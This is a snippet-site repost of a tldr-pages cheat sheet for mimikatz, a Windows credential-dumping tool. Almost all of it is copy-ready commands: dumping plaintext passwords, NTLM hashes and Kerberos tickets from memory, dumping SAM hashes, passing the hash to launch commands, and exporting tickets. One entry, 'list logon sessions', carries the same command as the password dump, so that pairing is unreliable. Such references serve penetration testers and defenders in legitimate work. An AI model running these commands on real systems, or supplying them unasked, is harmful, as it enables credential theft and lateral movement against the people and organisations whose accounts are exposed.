snippetbashTip
mimikatz — Interact with Windows credentials, perform credential dumping, token manipulation, and more. Require
Viewed 0 times
commandwindowsinteractclicredentialsmimikatzwithperform
windows
Problem
How to use the
mimikatz command: Interact with Windows credentials, perform credential dumping, token manipulation, and more. Requires administrator privileges and typically runs on Windows. More information: <https://github.com/gentilkiwi/mimikatz>.Solution
mimikatz — Interact with Windows credentials, perform credential dumping, token manipulation, and more. Requires administrator privileges and typically runs on Windows. More information: <https://github.com/gentilkiwi/mimikatz>.Run mimikatz in interactive mode:
mimikatzEnable debug privileges (needed for most operations):
mimikatz "privilege::debug"List available logon sessions:
mimikatz "sekurlsa::logonpasswords"Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory:
mimikatz "sekurlsa::logonpasswords"Pass-the-Hash with a specific NTLM hash and launch a command:
mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"Dump local SAM database hashes:
mimikatz "lsadump::sam"Extract Kerberos tickets and export to a file:
mimikatz "kerberos::list /export"[Interactive] Exit mimikatz:
exitCode Snippets
Run mimikatz in interactive mode
mimikatzEnable debug privileges (needed for most operations)
mimikatz "privilege::debug"List available logon sessions
mimikatz "sekurlsa::logonpasswords"Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory
mimikatz "sekurlsa::logonpasswords"Pass-the-Hash with a specific NTLM hash and launch a command
mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"Context
tldr-pages: windows/mimikatz
Revisions (0)
No revisions yet.